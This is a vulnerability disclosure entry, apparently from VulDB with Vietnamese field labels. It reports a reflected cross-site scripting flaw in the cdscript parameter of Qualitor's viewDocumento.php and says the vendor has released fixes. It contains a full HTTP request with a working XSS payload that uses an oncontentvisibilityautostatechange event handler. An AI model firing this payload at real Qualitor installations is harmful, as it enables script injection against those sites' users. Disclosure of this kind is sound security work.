| tiêu đề | Qualitor 8.20.77 - 8.24.73 Cross Site Scripting |
|---|
| Mô tả | The vulnerability was reported to the vendor, who made the fixes and released new versions.
I identified a cross-site scripting vulnerability in the call parameter:
GET /Qualitor/html/bc/bcdocumento9/biblioteca/request/viewDocumento.php?cdscript=145"/>%20<p+oncontentvisibilityautostatechange="alert(/chor4o/)"%20style="content-visibility:auto&cddocumento=644 HTTP/2
Host: teste.teste.com.br
Cookie: deleted, generate a new one
User agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0,9,*/*;q=0,8
Acceptance language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers |
|---|
| Nguồn | ⚠️ https://www.qualitor.com.br/ |
|---|
| Người dùng | chor4o (UID 52584) |
|---|
| Đệ trình | 02/12/2025 16:32 (cách đây 5 các tháng) |
|---|
| Kiểm duyệt | 12/12/2025 15:46 (10 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 336201 [Qualitor đến 8.24.73 viewDocumento.php cdscript Tập lệnh chéo trang] |
|---|
| điểm | 17 |
|---|